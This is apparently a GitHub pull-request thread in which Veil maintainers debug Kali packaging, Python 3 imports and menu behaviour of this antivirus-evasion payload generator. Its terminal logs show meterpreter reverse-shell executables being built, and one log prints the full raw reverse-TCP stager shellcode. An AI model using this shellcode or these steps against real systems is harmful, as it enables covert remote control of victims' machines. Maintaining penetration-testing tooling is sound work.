Applying Kali's Patches & Other stuff

[g0tmi1k]

No description provided.

[ChrisTruncer]

Hey, I went through and tested this. Ran into one issue, and one oddity I wanted to run by you. With this current pull request, I can't generate golang based payloads. When trying to compile, it provides the following error:

Also, this isn't a bug because it still works, but when giving the "generate" command, Veil normally used to go back to it's normal menu (it has the Veil header at the top) and asks how to get the shellcode. However, now it seems to just go to the next line down (in the pic below).

I'm not sure if this is due to the patch, or somehow the code doing something odd. I'll try to check into it too.

[g0tmi1k]

Sorry, the commits before were WIP.
It is now finished/ready to be merged.

---

The reason why it continues, is because it was running os.system, which failed without fully checking the output (REF: https://github.com/Veil-Framework/Veil/blob/master/tools/evasion/evasion_common/outfile.py#L206
w).
Fixed the os.system, but didn't fix the checking for output file.

---

g0tmi1k@kali-dev:~/Desktop/Veil$ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

runtime/internal/sys
runtime/internal/atomic
runtime
errors
internal/race
sync/atomic
math
sync
io
unicode/utf8
internal/syscall/windows/sysdll
unicode/utf16
syscall
strconv
reflect
encoding/binary
command-line-arguments
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Language: go
 [*] Payload Module: go/meterpreter/rev_tcp
 [*] Executable written to: /var/lib/veil/output/compiled/payload.exe
 [*] Source code written to: /var/lib/veil/output/source/payload.go
 [*] Metasploit RC file written to: /var/lib/veil/output/handlers/payload.rc
g0tmi1k@kali-dev:~/Desktop/Veil$ 
g0tmi1k@kali-dev:~/Desktop/Veil$ file /var/lib/veil/output/compiled/payload.exe
/var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
g0tmi1k@kali-dev:~/Desktop/Veil$
g0tmi1k@kali-dev:~/Desktop/Veil$ ls -lah /var/lib/veil/output/compiled/payload.exe
-rwxr-xr-x 1 g0tmi1k g0tmi1k 770K Apr 11 17:40 /var/lib/veil/output/compiled/payload.exe
g0tmi1k@kali-dev:~/Desktop/Veil$

[ChrisTruncer]

There looks to be a big when using msfvenom for generating shellcode rather than veil-ordnance. If you use msfvenom, you get asked for the payload type, IP, and port. It then asks if you have any extra options. If there are none, and you hit enter, msfvenom should generate the shellcode.

However, if you hit enter, msfvenom isn't invoked, and you're dropped right into the Veil-Ordnance menu.

[g0tmi1k]

Thanks @leesoh !

[g0tmi1k]

@ChrisTruncer I can't find your bug. I don't know where you are looking/how you are trigging it.

Evasion

g0tmi1k@kali-dev:~/Desktop/Veil$ ./Veil.py 
===============================================================================
                             Veil | [Version]: 3.1.5
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

	2 tools loaded

Available Tools:

	1)	Evasion
	2)	Ordnance

Available Commands:

	exit			Completely exit Veil
	info			Information on a specific tool
	list			List available tools
	options			Show Veil configuration
	update			Update Veil
	use			Use a specific tool


Main menu choice: use 1
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Veil-Evasion Menu

	41 payloads loaded

Available Commands:

	back			Go to Veil's main menu
	checkvt			Check VirusTotal against generated hashes
	clean			Remove generated artifacts
	exit			Completely exit Veil
	info			Information on a specific payload
	list			List available payloads
	use			Use a specific payload

Veil-Evasion command: use 5
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 Payload information:

	Name:		Pure C Reverse HTTP Stager
	Language:	c
	Rating:		Excellent
	Description:    pure windows/meterpreter/reverse_http stager, no
	                shellcode

Payload: c/meterpreter/rev_http selected

Required Options:

Name            	Value   	Description
----            	-----   	-----------
COMPILE_TO_EXE  	Y       	Compile to an executable
LHOST           	        	IP of the Metasploit handler
LPORT           	8080    	Port of the Metasploit handler

 Available Commands:

	back        	Go back
	exit        	Completely exit Veil
	generate    	Generate the payload
	options     	Show the shellcode's options
	set         	Set shellcode option
[c/meterpreter/rev_http>>] set LHOST 127.0.0.1
[c/meterpreter/rev_http>>] options

Payload: c/meterpreter/rev_http selected

Required Options:

Name            	Value   	Description
----            	-----   	-----------
COMPILE_TO_EXE  	Y       	Compile to an executable
LHOST           	127.0.0.1	IP of the Metasploit handler
LPORT           	8080    	Port of the Metasploit handler

 Available Commands:

	back        	Go back
	exit        	Completely exit Veil
	generate    	Generate the payload
	options     	Show the shellcode's options
	set         	Set shellcode option
[c/meterpreter/rev_http>>] run
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Please enter the base name for output files (default is payload): test100
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Language: c
 [*] Payload Module: c/meterpreter/rev_http
 [*] Executable written to: /var/lib/veil/output/compiled/test100.exe
 [*] Source code written to: /var/lib/veil/output/source/test100.c
 [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/test100.rc

Hit enter to continue... 
[c/meterpreter/rev_http>>] exit
g0tmi1k@kali-dev:~/Desktop/Veil$ 

---

Ordnance

g0tmi1k@kali-dev:~/Desktop/Veil$ ./Veil.py 
===============================================================================
                             Veil | [Version]: 3.1.5
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

	2 tools loaded

Available Tools:

	1)	Evasion
	2)	Ordnance

Available Commands:

	exit			Completely exit Veil
	info			Information on a specific tool
	list			List available tools
	options			Show Veil configuration
	update			Update Veil
	use			Use a specific tool


Main menu choice: use 2
===============================================================================
                                   Veil-Ordnance
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Veil-Ordnance Menu

	6 payloads loaded
	1 encoders loaded

Available Commands:

	back			Go to Veil's main menu
	exit			Completely exit Veil
	info			Information on a specific payload or encoder
	list			List available [payloads] or [encoders]
	use			Use a specific payload

Veil-Ordnance command: use rev_tcp
===============================================================================
                                   Veil-Ordnance
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Payload: rev_tcp selected

Required Options:

Name            	Value   	Description
----            	-----   	-----------
BadChars        	\x00    	Optional: Bad characters to avoid
Encoder         	None    	Optional: Encoder to use when avoiding bad characters
LHOST           	        	LHOST value
LPORT           	        	LPORT value

Available Commands: 

	back    		Go back 
	exit    		Completely exit Veil
	generate		Generate the payload
	list    		List available encoders
	options 		Show the payload's options
	set     		Set payload option

[rev_tcp>>]: set LPORT 4444
[rev_tcp>>]: set LHOST 127.0.0.1
[rev_tcp>>]: options
===============================================================================
                                   Veil-Ordnance
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Payload: rev_tcp selected

Required Options:

Name            	Value   	Description
----            	-----   	-----------
BadChars        	\x00    	Optional: Bad characters to avoid
Encoder         	None    	Optional: Encoder to use when avoiding bad characters
LHOST           	127.0.0.1	LHOST value
LPORT           	4444    	LPORT value

Available Commands: 

	back    		Go back 
	exit    		Completely exit Veil
	generate		Generate the payload
	list    		List available encoders
	options 		Show the payload's options
	set     		Set payload option

[rev_tcp>>]: run
Payload Name: Reverse TCP Stager (Stage 1)
IP Address: 127.0.0.1
Port: 4444
Shellcode Size: 287

\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x09\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3

Hit enter to continue... 
[rev_tcp>>]: exit
g0tmi1k@kali-dev:~/Desktop/Veil$

[ChrisTruncer]

No, it did not have the PR merged. I was using it as a separate baseline. I'm a little concerned that that change though is impacting Veil (as shown in the end of the pastebin). When I was trying to use Ordnance to generate shellcode, it couldn't take that generated shellcode back into Evasion.

[ChrisTruncer]

I'm fine with staying on the same menu and not going immediately back into the top level menu. But I'm not sure if that mod is preventing Evasion from grabbing the shellcode from Ordnance

[g0tmi1k]

Could you give example commands/output, cos I'm really not seeing it.

[ChrisTruncer]

This is still staying in the Ordnance screen after generating shellcode (after it says "hit enter to return to veil-evasion"). Currently, you have to type back even though it says to hit enter. At this point, I'd prefer for it to jump right back into Evasion if using Ordnance as our shellcode generator.

Sample output here - https://pastebin.com/xq3mY7um

Also, line 158 and 159 show it not displaying the header and just has the commands right after the previous ones.

[programatologist]

Shouldn't this be
import tools as ordnance_import
rather than
import tool as ordnance_import since the module(folder) name is tools
Same issue present in
tools/evasion/evasion_common/shellcode_help.py

[g0tmi1k]

@programatologist ~ But the file it's including is called ./tools/ordnance/tool.py not ./tools/ordnance/tools.py ?

[programatologist]

This should be
import tools as ordnance_import
rather than
import tool as ordnance_import since the module(folder) name is tools

[g0tmi1k]

@programatologist ~ But the file it's including is called ./tools/ordnance/tool.py not ./tools/ordnance/tools.py ?

[g0tmi1k]

Working!

The issue was we were using different payloads...

root@kali-dev:~/Desktop/veil# ./Veil.py 
...SNIP...
Veil>: use 1
...SNIP...
Veil/Evasion>: use 33
...SNIP...
[python/shellcode_inject/flat>>]: run
...SNIP...
 [>] Please enter the number of your choice: 1
...SNIP...
Veil/Ordnance>: use 2
...SNIP...
[rev_http>>]: set LHOST 127.0.0.1
[rev_http>>]: set LPORT 443
[rev_http>>]: run
...SNIP...
Please enter the base name for output files (default is payload): out
...SNIP...
 [>] Please enter the number of your choice: 1
...SNIP...
 [*] Language: python
 [*] Payload Module: python/shellcode_inject/flat
 [*] Executable written to: /var/lib/veil/output/compiled/out.exe
 [*] Source code written to: /var/lib/veil/output/source/out.py
 [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/out.rc

Hit enter to continue...
...SNIP...
Veil/Evasion>: 

[ChrisTruncer]

This is currently failing to start on Debian. I tried on my existing VM, but I did not build a brand new VM. However, I get a "No module named Tool" error.

[ChrisTruncer]

Ok, I figured out the reason @g0tmi1k if you are able to modify your pull request. This should be a quick fix.

Line 741 should say "python3" instead of python when invoking the update-config.py script. After that, it seems to work and run on my system.

Only final issue I am having is the tab completion and all of msfvenom shellcode generation is broken on Debian. Trying to look into it now.

[ChrisTruncer]

It looks like the "Metasploit_Path" variable is being set within the update-config.py file except for one-offs based on linux flavor detection and the path is being changed. Could you change line 178's default value of Metasploit_Path to be "/opt/metasploit-framework/embedded/framework/"?

Veil needs it to be that path to properly parse available payloads under it. Once both changes (from above post too) are made, I think this is good to go. I'll test one more time, but seems to be working with these changes on my end.

[g0tmi1k]

Rather than doing something like:

  type python3 2>&1 >/dev/null
  [ $? -eq "0" ] \
    && sudo -u "${trueuser}" sudo python3 update-config.py \
    || sudo -u "${trueuser}" sudo python update-config.py

Something "better" would be to use the shebang to define the python version (as it is already set there!) ~ https://github.com/g0tmi1k/Veil/blob/4791e2a6b6c2b9e7a2759d9305965af0d4efa66e/config/update-config.py#L1.

I dunno what the package path is for Metasploit outside of Kali :P.

Commited!

[ChrisTruncer]

just pushed minor update to readme.

All looks great! THanks for the large amount of time taken to do this, and it's now getting merged!

[ChrisTruncer]

merged!

[g0tmi1k]

🎉